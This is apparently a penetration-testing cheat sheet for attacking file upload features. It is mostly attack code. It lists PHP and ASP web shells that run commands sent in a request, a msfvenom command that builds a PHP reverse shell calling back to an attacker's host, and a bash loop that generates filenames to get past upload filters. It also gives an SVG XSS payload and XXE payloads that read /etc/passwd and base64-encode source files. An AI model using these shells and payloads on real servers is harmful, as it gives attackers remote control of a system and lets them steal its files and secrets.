# Web Shells ```bash # Basic PHP File Read <?php echo file_get_contents('/etc/passwd'); ?> # Basic PHP Command Execution <?php system('hostname'); ?> # Basic PHP WebShell <?php system($_REQUEST['cmd']); ?> # Basic ASP WebShell <% eval request('cmd') %> # Generate PHP reverse shell msfvenom -p php/reverse_php LHOST=<IP> LPORT_<PORT> -f raw > reverse.php # phpbash https://github.com/Arrexel/phpbash # php reverse shell https://github.com/pentestmonkey/php-reverse-shell # seclists web/reverse shells https://github.com/danielmiessler/SecLists/tree/master/Web-Shells ``` # Bypasses ```bash # Client-Side Bypass Toggle Page Inspector # Blacklist Bypass .phtml, pHp, php7, phar, etc. # PHP extensions https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst # ASP extensions https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Extension%20ASP # Web extensions /usr/share/seclists/Discovery/Web-Content/web-extensions.txt # Whitelist Bypass ## Double extension shell.jpg.php # Reverse double extension shell.php.jpg # Character Injection `%20`, `%0a`, `%00`, `%0d0a`, `/`, `.\`, `.`, `…`, `:` for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do for ext in '.php' '.phps'; do echo "shell$char$ext.jpg" >> wordlist.txt echo "shell$ext$char.jpg" >> wordlist.txt echo "shell.jpg$char$ext" >> wordlist.txt echo "shell.jpg$ext$char" >> wordlist.txt done done # Content/Type Bypass ## List of All Content Types https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-all-content-types.txt cat web-all-content-types.txt | grep 'image/' > image-content-types.txt # File Signatures / Magic Bytes https://en.wikipedia.org/wiki/List_of_file_signatures ``` # Limited Uploads ```bash XSS - HTML, JS, SVG, GIF XXE/SSRF - XML, SVG, PDF, PPT, DOC # payload 1 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1"> <rect x="1" y="1" width="1" height="1" fill="green" stroke="black" /> <script type="text/javascript">alert(window.origin);</script> </svg> # payload 2 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <svg>&xxe;</svg> # payload 3 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]> <svg>&xxe;</svg> DoS - ZIP, JPG, PNG ```